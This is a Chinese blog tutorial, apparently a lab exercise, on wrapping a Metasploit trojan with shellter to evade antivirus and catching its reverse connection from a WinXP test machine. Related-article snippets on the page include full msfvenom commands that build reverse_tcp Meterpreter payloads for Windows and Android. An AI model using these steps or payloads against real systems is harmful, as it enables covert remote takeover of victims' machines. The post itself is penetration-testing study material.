Metasploit(msf)系列-木马免杀

最新推荐文章于 2023-08-12 09:57:57 发布
最新推荐文章于 2023-08-12 09:57:57 发布
阅读量9.2k 收藏 69
点赞数 11
分类专栏: msf系列
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36197704/article/details/82991502
版权

    木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。

原理:

       首先生成木马文件,然后将生成的木马文件与shellter免杀工具捆绑,然后设置监听,将捆绑后的文件拷贝到WinXP系统中,双击后,发现攻击成功,最后将该文件在腾讯哈勃分析系统上分析。

准备:

靶    机:WinXP系统  ip:192.168.1.102

攻击主机:Kali         ip:192.168.1.111

 

实战:

Step1:生成hacker.exe木马文件

Step2:下载安装shellter免杀工具,切换到shellter文件夹下,执行shellter工具,在后面选择A

Step3:PE Target 后面填写/root/hacker.exe

Step4:选择Y,使用这个模块,填如L,payload反弹选择1

Step5:输入攻击主机ip192.168.1.111,端口为1234

Step6:输入msfconsole进入metasploit

Step7:进入监听模块

Step8:设置payload反弹,设置LHOST参数192.168.1.111,设置LPORT参数为1234,exploit攻击开始

Step9:把生成的木马文件hacker.exe拷贝到靶机WinXP系统中

Step10:攻击成功

Step11:在腾讯哈勃分析系统上分析hacker.exe木马文件

      可以看到木马文件风险指数是轻度风险,但是实际风险指数要高,shellter免杀工具对一些安全软件还是可以绕过的,但是360、电脑管家不行,这个工具对国外的一些安全软件免杀效果好。

      之后就可以对该主机进行一些越权的操作了:可以对WinXP系统进行远程登录、可以在该主机放入别的木马文件、删除文件、添加管理员用户等。

chaojixiaojingang
关注
  • 11
    点赞
  • 69
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Kali Linux使用Metasploit生成木马入侵安卓系统
简介
02-24 8096
前言,前言这是我最难想出来的对,这是我最后一篇文章,周一我们开学了,漏洞实战怕实现不了,至少放假可以更文章,我们只放一天,提示:以下是本篇文章正文内容,下面案例可供参考时间不够了,所以不做演示了,所以再见。
【网络安全】简单的免杀方法(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
04-14 1585
目录一、免杀的概念二、免杀系统搭建三、免杀工具介绍1、myccl2、C32asm3、OD4、LordPE5、ImportREC6、VC++6.0/visual studio7、数字签名四、关于杀软排名不分前后1、360。2、金山毒霸3、江民4、瑞星5、安天防线6、卡巴斯基7、NOD328、诺顿9、小红伞,木伞10、BD五、杀软的查杀方法1、最基础的查杀2.1、静态启发式2.2、动态启发式3、HIPS4、云安全六、免杀方面的术语1、API2、花指令3、输入表4、区段5、加壳6、启发7、隐藏输入表什么是免杀
Kali Linux利用MSF入侵安卓手机
weixin_42916109的博客
06-06 6052
参数设置好之后在靶机打开程序然后执行步骤6的命令,也可以直接输入命令exploit开始攻击,只要靶机安装了后门软件用什么方法都可以,直接run开始执行攻击也行。我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面。解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令。提示:执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可。
简单的Msf木马免杀
weixin_47948655的博客
08-12 1064
简单加密shellcode与加载器实现msf木马免杀
msf生成免杀木马
qq_56426046的博客
09-08 5453
1.修改特征码免杀的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的病毒技术来讲,更改特征码从而达到免杀的效果事实上包含着两种方式。一种是改特征码,这也是免杀的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
2021Kali -- 木马免杀制作
weixin_41489908的博客
04-24 3925
​知道为什么梦里的人都看不清脸么?因为怕你当真。。。 ---- 网易云热评 一、通过MSF生成shellcode 1、启动MSF,演示版本是6.0.36 2、通过msfvenom生成相关代码 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=192.168.139.133 lport=8585 -f c -p:指定payload -e:指定选择使用的编码 ...
kali linux msf系列视频教程
10-25
kali linux msf系列教程 -------------------------------------------- kali msf 系列 第一章虚拟机使用 kali msf 系列 第一章虚拟机使用 ...kali msf 系列 第八章木马免杀 kali msf 系列 第九章持续控制
metasploit开发使用详细解析
04-18
自 2003 年开源以来,Metasploit Framework (MSF) 已经成为安全社区中的重要工具,它不仅提供了大量的预构建exploits(攻击模块),还支持自定义脚本和payloads(有效载荷)的编写,以便于测试和分析目标系统的安全...
metasploit开发使用详细解析.docx
03-22
Metasploit Framework(MSF)自2003年起以开源形式发布,提供了一个统一的平台,用于开发、测试和利用恶意代码。其核心功能包括漏洞利用、payload 控制、编码器和无操作序列生成,为安全专家提供了强大而灵活的研究...
Metasploit+Framework:黑掉整个星球
08-14
Metasploit Framework,简称MSF,是全球安全研究人员和渗透测试工程师广泛使用的开源工具,它为黑客测试网络防御提供了强大的平台。这个框架的强大之处在于其模块化的结构,允许用户通过简单地组合各种攻击向量来...
msfconsole讲解.pptx
09-27
hack -msf 木马生成精讲,PPT MSF全称msfconsole,Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,...MSF有免费和收费两种版本,收费版本具有免杀功能。
kali安卓手机木马远控
热门推荐
m0_65606241的博客
05-06 1万+
得到kali本机IP,设置端口 利用msf payload模块生成木马 命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.174.129 lport=5555 R > 1.apk 木马生成后 开启我们的监听模块msfconsole 进入控制端后,设置一个安卓的playload(之前使用过的) 设置监听kali虚拟机的ip地址和端口号(与之前生成apk木马文件的命令参数相同) run启用,等待木马..
Metasploit 实现木马生成、捆绑及免杀
阿里云云栖号
10-08 5102
简介:在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。本次实验我们将学习如何通过Metasploitmsfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理。木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 实验环境: Kali Linux 知识点: msfvenom 如何生.
利用kali Linux使用meterpreter制作免杀木马测试入侵windows电脑
WuHao的博客
10-26 5659
前言:常规使用meterpreter制作木马时会被各大杀毒软件所拦截,固本文介绍一下利用meterpreter下的Venom制作免杀木马。 首先安装Venom Venon克隆地址:https://github.com/r00t-3xp10it/venom tar.gz OR zip OR git clone 2.赋予文件可执行权限: cd venom-main sudo chmod -R +x *.sh 3.安装依赖关系包: cd aux sudo ./setup.sh 4.运行 sudo.
MSF生成木马木马的简单使用
爱喝水的仙人树的博客
11-03 8654
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
MSF-loader底层分析免杀过360
技术超强的网络安全平台
12-06 241
系列文章专辑:渗透测试之地基篇简介渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意:本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!一、前言metasploit 是一款开源的安全漏
msfvenom捆绑/制作木马程序
qq_45740212的博客
01-28 4177
msfvenom捆绑/制作木马程序,并用Kali实现监听
利用metasploit生成免杀后门
mirror97black的博客
01-26 5620
免杀 之前的博客中,有利用msf生成代码,目标机执行然后获得shell。但是现在有很多杀软,对各种木马有检测机制,执行危险代码或者运行危险程序,杀软会进行阻止。 免杀有很多种方式,今天介绍一种利用msf生成shellcode免杀,编译为exe文件,这种免杀能够绕过大部分杀软 静态免杀 静态免杀是能够绕过杀软检测,运行时也不会报毒。但是执行危险命令就会报毒,比如说新建用户、进程注入等。 使
msf生成linux木马
03-16
MSFMetasploit Framework的缩写,是一款常用的渗透测试工具。要生成Linux木马,可以使用MSF中的payload生成器来创建一个适合Linux系统的payload,然后使用MSF中的exploit模块来利用漏洞,将payload注入到目标系统中,从而实现远程控制。具体操作可以参考MSF的官方文档或相关教程。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值